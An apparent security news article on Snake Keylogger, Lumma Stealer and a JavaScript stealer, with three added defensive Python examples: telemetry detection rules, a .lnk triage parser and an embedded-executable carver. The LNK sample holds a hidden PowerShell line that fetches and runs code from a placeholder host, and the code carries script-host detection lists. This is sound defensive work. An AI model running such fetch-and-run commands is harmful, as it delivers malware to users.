A recently discovered variant of the Snake Keylogger malware is actively targeting Windows users, primarily in China, Turkey, Indonesia, Taiwan, and Spain.
According to Fortinet FortiGuard Labs, the new version of the malware has resulted in over 280 million blocked infection attempts globally since the beginning of the year.
The malware is typically spread through phishing emails with malicious attachments or links and is designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox by tracking keystrokes, capturing credentials, and monitoring the clipboard, as explained by security researcher Kevin Su in a report.
Notably, the malware exfiltrates stolen information to an attacker-controlled server using the Simple Mail Transfer Protocol (SMTP) and Telegram bots, enabling threat actors to access stolen credentials and other sensitive data.
What’s significant about the latest attacks is the use of the AutoIt scripting language to deliver and execute the main payload: the payload ships inside a compiled AutoIt executable, which helps the dropper slip past static, signature-based detection.
“The use of AutoIt complicates static analysis by embedding the payload within the compiled script and enables dynamic behavior that mimics benign automation tools,” Su noted.
Upon launch, Snake Keylogger drops a copy of itself to a file named “ageless.exe” in the “%Local_AppData%\supergroup” folder and another file called “ageless.vbs” in the Windows Startup folder, so the script runs at every user logon (and therefore after every reboot) and relaunches the executable.
This persistence mechanism allows Snake Keylogger to maintain access to the compromised system and resume its malicious activities even if the associated process is terminated.
The attack chain concludes with the injection of the main payload into a legitimate .NET process, such as “regsvcs.exe,” using process hollowing: the legitimate binary is started suspended and its in-memory image is replaced with the payload, so the malware runs under the name of a trusted process and evades detection.
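The persistence and injection steps above leave telemetry that an endpoint sensor records: a script file created in the Startup folder, a script host launched from that folder, and a .NET utility such as regsvcs.exe started by an executable under %LOCALAPPDATA% with no command-line arguments (a hollowed host needs none, whereas a real regsvcs.exe run takes an assembly path). The following detection logic is an added example, not code from Fortinet or the report; the event records are constructed inline and use Sysmon-style field names (EventID 1 with Image/ParentImage/CommandLine, EventID 11 with TargetFilename), and the user name, paths and rule names are assumptions.

```python
"""Detection logic for Startup-folder persistence and .NET-host hollowing (added example)."""
import re

# .NET Framework utilities commonly abused as hollowing hosts; regsvcs.exe is the one named in the report.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
STARTUP_DIR = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.IGNORECASE)
LOCAL_APPDATA = re.compile(r"\\appdata\\local\\", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def arguments_of(command_line: str) -> str:
    """Strip the (possibly quoted) image path and return whatever arguments remain."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[end + 1:].strip() if end != -1 else ""
    parts = cmd.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def evaluate(event: dict) -> list:
    """Return the rule names an event trips; an empty list means the event looks normal."""
    hits = []
    if event.get("EventID") == 1:                       # process creation
        image = basename(event.get("Image", ""))
        parent = event.get("ParentImage", "")
        cmdline = event.get("CommandLine", "")
        if image in DOTNET_HOSTS:
            if LOCAL_APPDATA.search(parent):            # trusted .NET binary spawned from a user-writable dir
                hits.append("dotnet-host-from-localappdata")
            if not arguments_of(cmdline):               # hollowed host is started bare, real use passes an assembly
                hits.append("dotnet-host-without-arguments")
        if image in SCRIPT_HOSTS and STARTUP_DIR.search(cmdline):
            hits.append("script-host-from-startup-folder")
    elif event.get("EventID") == 11:                    # file creation
        target = event.get("TargetFilename", "")
        if STARTUP_DIR.search(target) and target.lower().endswith(SCRIPT_EXTS):
            hits.append("script-dropped-in-startup-folder")
    return hits


def scan(events) -> list:
    """Run every event through the rules and return (index, hits) for those that matched."""
    out = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample telemetry (assumed user "alice"); the last record is a benign regsvcs.exe use.
SAMPLE_EVENTS = [
    {"EventID": 11,
     "Image": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"'},
    {"EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"'},
    {"EventID": 1,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" "C:\Program Files\Vendor\Component.dll"'},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits)
```

The no-arguments rule is the cheap, log-only proxy for hollowing; confirming it on a live host still means comparing the process's in-memory image against the file on disk.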
Additionally, Snake Keylogger logs keystrokes and queries websites like checkip.dyndns[.]org to learn the victim’s public IP address and geolocation.
“To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL (flag 13), a low-level keyboard hook that monitors keystrokes,” Su explained. “This technique allows the malware to log sensitive input, such as banking credentials.”
Meanwhile, CloudSEK has detailed a campaign exploiting compromised infrastructure associated with educational institutions to distribute malicious LNK files disguised as PDF documents, ultimately deploying the Lumma Stealer malware.
The campaign, targeting industries like finance, healthcare, technology, and media, involves a multi-stage attack sequence resulting in the theft of passwords, browser data, and cryptocurrency wallets.
“The campaign’s primary infection vector involves using malicious LNK (shortcut) files crafted to appear as legitimate PDF documents,” security researcher Mayank Sahariya explained, adding that the files are hosted on a WebDAV server that unsuspecting visitors are redirected to after visiting compromised sites.
The LNK file executes a PowerShell command that connects to a remote server and retrieves the next stage: obfuscated JavaScript that in turn carries a second PowerShell script, which downloads Lumma Stealer from the same server and executes it.
In a separate campaign, stealer malware has also been distributed via obfuscated JavaScript files to harvest a wide range of sensitive data from compromised Windows systems and exfiltrate it to a Telegram bot operated by the attacker.
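A shortcut that pretends to be a PDF can be triaged offline by reading the .lnk structure itself rather than trusting the file name: the ShellLinkHeader gives the LinkFlags and ShowCommand, and the StringData section carries the relative target path and the arguments that Explorer will pass to it. The parser and triage rules below are an added example, not code from CloudSEK or the report; the layout follows MS-SHLLINK (header size 0x4C, CLSID 00021401-0000-0000-C000-000000000046, string fields in NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON_LOCATION order), the sample shortcut is constructed in the code with an assumed file name, and the server name example.invalid is a placeholder.

```python
"""Parse and triage Windows .lnk files that pose as documents (added example)."""
import struct

# ShellLinkHeader constants from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7       # window starts minimized and inactive: the usual way to hide a console
STRING_FIELDS = (            # StringData entries, in the order the format stores them
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a Shell Link; the IDList and LinkInfo blocks are skipped."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:             # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                       # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, field in STRING_FIELDS:                # CountCharacters (2 bytes) then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            info[field] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[field] = data[off:off + count].decode("cp1252")
            off += count
    return info


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Build a minimal Unicode .lnk (StringData only, no IDList/LinkInfo) for the sample below."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    fields = {"relative_path": relative_path, "arguments": arguments}
    out = bytearray(struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                                0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0))
    for bit, field in STRING_FIELDS:
        if flags & bit:
            out += struct.pack("<H", len(fields[field])) + fields[field].encode("utf-16-le")
    return bytes(out)


def triage_lnk(filename: str, data: bytes) -> list:
    """Return finding codes for a shortcut; an empty list means nothing looked suspicious."""
    info = parse_lnk(data)
    name = filename.lower()
    cmdline = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    findings = []
    if name.endswith(".lnk") and any(name.endswith(ext + ".lnk") for ext in DOC_EXTS):
        findings.append("doc-lookalike-name")         # "Invoice.pdf.lnk" shows as "Invoice.pdf" in Explorer
    if any(host in cmdline for host in SCRIPT_HOSTS):
        findings.append("script-host")                # a document does not need a shell or script engine
    if info["show_command"] == SW_SHOWMINNOACTIVE or "-w hidden" in cmdline or "windowstyle hidden" in cmdline:
        findings.append("hidden-window")
    if "http://" in cmdline or "https://" in cmdline or "\\\\" in cmdline:
        findings.append("remote-fetch")               # URL or UNC/WebDAV path in the command line
    return findings


# Constructed samples: a malicious lookalike and a benign shortcut. example.invalid is a placeholder host.
SAMPLE_LNK_NAME = "Invoice_2024.pdf.lnk"
SAMPLE_LNK_ARGS = '-w hidden -nop -c "iex (iwr http://example.invalid/next)"'
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                       SAMPLE_LNK_ARGS, show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk("..\\..\\..\\Windows\\System32\\notepad.exe")

if __name__ == "__main__":
    print(SAMPLE_LNK_NAME, triage_lnk(SAMPLE_LNK_NAME, SAMPLE_LNK))
    print("readme.lnk", triage_lnk("readme.lnk", BENIGN_LNK))
```

Real shortcuts usually carry an IDList and LinkInfo block before the strings; the parser honours the size prefixes of both, so the same code works on files pulled from a mailbox or a WebDAV share, not only on the synthetic sample.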
“The attack begins with an obfuscated JavaScript file, which fetches encoded strings from an open-source service to execute a PowerShell script,” Cyfirma explained.
“This script then downloads a JPG image and a text file from an IP address and a URL shortener, both of which contain malicious MZ DOS executables embedded using steganographic techniques. Once executed, these payloads deploy stealer malware.”
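The page says the JPG and text file carry MZ executables "embedded using steganographic techniques" but does not say how. The carver below is an added example, not code from Cyfirma; it assumes the two commonest low-tech embeddings, a raw PE appended after the JPEG end-of-image marker and a PE stored as a long base64 run inside the file, and validates a hit by checking that the candidate's DOS header points at a real "PE\0\0" signature rather than trusting the "MZ" bytes alone. The image and executable are constructed inline.

```python
"""Carve raw or base64-encoded PE files out of image/text payloads (added example)."""
import base64
import re
import struct

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A base64 run long enough to be worth decoding; short runs are ordinary text or chance.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def is_pe(buf: bytes) -> bool:
    """True if buf starts with a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(buf) - 4 and buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_embedded_pe(data: bytes) -> list:
    """Return (kind, offset, size) for every PE found raw or base64-encoded inside data.

    For a raw hit, size is the number of bytes from the MZ header to end of file; the exact
    image length would need the section table, which this example does not parse.
    """
    findings = []
    for m in re.finditer(rb"MZ", data):                 # raw executable appended or embedded
        if is_pe(data[m.start():]):
            findings.append(("raw", m.start(), len(data) - m.start()))
    for m in B64_RUN.finditer(data):                    # executable hidden as base64 text
        run = m.group()
        run = run[:len(run) - len(run) % 4]             # drop a ragged tail so b64decode accepts it
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:                              # binascii.Error is a ValueError
            continue
        if is_pe(decoded):
            findings.append(("base64", m.start(), len(decoded)))
    return findings


def trailer_after_eoi(data: bytes) -> int:
    """Bytes after the first JPEG end-of-image marker; -1 if data is not a JPEG or has no EOI."""
    if not data.startswith(JPEG_SOI):
        return -1
    eoi = data.find(JPEG_EOI, 2)
    return -1 if eoi == -1 else len(data) - eoi - 2


def make_sample_pe() -> bytes:
    """Constructed stand-in for a dropped executable: DOS header with the classic e_cblp/e_cp/e_cparhdr
    values (whose base64 form starts with the well-known 'TVqQAAMAAAAEAAAA'), e_lfanew=0x80, then 'PE\\0\\0'."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<HHHH", dos, 2, 0x90, 3, 0, 4)
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"PE\x00\x00" + b"\x00\x01\x02" * 8


# Constructed samples: a tiny JPEG (SOI, APP0/JFIF segment, filler, EOI) with the PE appended raw,
# and the same JPEG with the PE appended as a base64 line.
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xdb\x00\x04\x00\x01" + b"\xff\xd9")
SAMPLE_PE = make_sample_pe()
SAMPLE_RAW = SAMPLE_JPEG + SAMPLE_PE
SAMPLE_B64 = SAMPLE_JPEG + b"\n" + base64.b64encode(SAMPLE_PE) + b"\n"

if __name__ == "__main__":
    for label, blob in (("raw", SAMPLE_RAW), ("base64", SAMPLE_B64)):
        print(label, "trailer bytes:", trailer_after_eoi(blob), "findings:", carve_embedded_pe(blob))
```

A non-zero trailer after the EOI marker is the quick triage signal; the carver then tells you whether that trailer is an executable and how it was encoded, which is what decides the next step (dump the raw bytes, or decode the base64 first).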